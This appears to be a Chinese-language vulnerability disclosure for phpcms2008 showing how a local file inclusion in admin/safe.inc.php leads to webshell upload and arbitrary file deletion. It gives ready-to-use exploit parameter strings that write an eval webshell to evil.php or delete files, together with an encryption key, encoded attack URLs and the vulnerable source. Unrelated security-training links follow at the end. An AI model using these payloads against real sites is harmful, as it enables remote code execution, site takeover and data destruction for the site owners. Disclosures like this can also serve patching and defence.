Phpcms本地包含漏洞导致的写shell漏洞和删除任意文
发布日期2011-05.04
发布作者c4rp3nt3r
影响版本phpcms2008 sp2 or sp4
官方地址http://.phpcms.
漏洞类型文件包含
漏洞描述phpcms本地包含类漏洞,如果该文件包含了/include/mon.inc.php就可以包含执行很多后台才能执行的文件了。
由于phpcms的全局变量机制,导致能拿shell的方法很多,类似的问题不止一个。
admin/safe.inc.php文件是后台扫木马的程序,很可惜的是虽然文件名叫做safe,一点也不safe。
公布一个本地包含秒杀拿shell的方法。
包含:admin/safe.inc.php文件GET提交一下数据
将在根目录下生成一句话
用上一篇得到的密钥$key='sIpeofogblFVCildZEwe';
加密如下字符串
$evil='i=1&m=1&f=fuck&action=edit_code&file_path=evil.php&code=<?eval($_POST[a])?>&mod=../../admin/safe.inc.php%00';
http://127.0.0.1/n/phpcms/play.php?a_k=GnRBQwJbXkEEUSAjIAJKBTkxHgoddBUBBhIwBA0II3AlAAABBTUWERt0FRMGCkEXChxgNSwNCVlmehITEiVYQTA2IDQ2NycLalZSQjcqE1hdZ19LQUkOAw8FKHkwCAoBdCwZBl05GBVKVl8=
将在根目录下生成一句话木马
同理任意文件删除漏洞
$evil='i=1&m=1&f=fuck&action=del_file&files=robots.txt&mod=../../admin/safe.inc.php%00';
http://127.0.0.1/n/phpcms/play.php?a_k=GnRBQwJbXkEEUSAjIAJKBTkxHgoddBQAAzkJDg4JYDAqBQkXZzcYBxw9A0sbHhtBDwMia21HQ0p0ahYBHiAeShwHCQJMBSg1bRkEFH91Rw==
参考:Flyh4t [PhpCMS]一个漏洞的二次利用
详细说明
贴上存在漏洞的代码
//admin/safe.inc.php
<?php
defined('IN_PHPCMS') or exit('Aess Denied');
// include/mon.inc.php 里面声明了常量
// define('IN_PHPCMS', TRUE);
if(empty($action)) $action = "start";
$safe = cache_read('safe.php');
$filecheck = load('filecheck.class.php');
if(empty($safe))
{
$safe = array (
'file_type' => 'php|js',
'code' => '',
'func' => '|system|exec|eval|escapeshell|cmd|passthru|base64_decode|gzunpress',
'dir' => $filecheck->checked_dirs()
);
}
switch ($action)
{
...
case 'edit_code':
if (file_put_contents(PHPCMS_ROOT.$file_path, stripcslashes($code)))
{
showmessage('修改成功!');
}
break;
case 'del_file':
$file_path = urldecode($files);
if (empty($file_path))
{
showmessage('请选择文件');
}
$file_list = cache_read('scan_backdoor.php');
unset($file_list[$file_path]);
cache_write('scan_backdoor.php',$file_list);
@unlink(PHPCMS_ROOT.$file_path);
showmessage('文件删除成功!', '?mod=phpcms&file=safe&action=scan_table');
break;
...
漏洞证明
将在根目录下生成一句话
用上一篇得到的密钥$key='sIpeofogblFVCildZEwe';
加密如下字符串
$evil='i=1&m=1&f=fuck&action=edit_code&file_path=evil.php&code=<?eval($_POST[a])?>&mod=../../admin/safe.inc.php%00';
http://127.0.0.1/n/phpcms/play.php?a_k=GnRBQwJbXkEEUSAjIAJKBTkxHgoddBUBBhIwBA0II3AlAAABBTUWERt0FRMGCkEXChxgNSwNCVlmehITEiVYQTA2IDQ2NycLalZSQjcqE1hdZ19LQUkOAw8FKHkwCAoBdCwZBl05GBVKVl8=
将在根目录下生成一句话木马
同理任意文件删除漏洞
$evil='i=1&m=1&f=fuck&action=del_file&files=robots.txt&mod=../../admin/safe.inc.php%00';
http://127.0.0.1/n/phpcms/play.php?a_k=GnRBQwJbXkEEUSAjIAJKBTkxHgoddBQAAzkJDg4JYDAqBQkXZzcYBxw9A0sbHhtBDwMia21HQ0p0ahYBHiAeShwHCQJMBSg1bRkEFH91Rw==
网络安全培训
- 网络安全带来的危害 网络安全的弊处
- 如何加强网络安全防范
- 网络安全防护知识内容摘要
- 什么网络安全指的是什么 网络安全指的是什么意
- 网络安全十大公司排名 网络安全十大公司排名绿
- 手机网络安全警示格言 手机网络安全警示教育片
- 网络安全培训心得体会 网络安全知识培训
- 如何树立正确的网络意识 怎么样正确对待网络
- 网络安全大赛是什么意思 网络安全大赛比赛规则
- 世界网络安全公司排名 世界十大网络安全上市公
- 网络安全注意事项知识 网络安全注意事项知识短
- 网络安全常识十条口诀 小学生安全十句话
- 网络安全等级保护三级 网络安全三级等保标准
- 如何增强网络安全防范意识 如何增强网络安全防
- 网络安全注意事项有哪些 网络安全应注意事项
- 网络安全培训感悟 网络安全培训后的收获和感想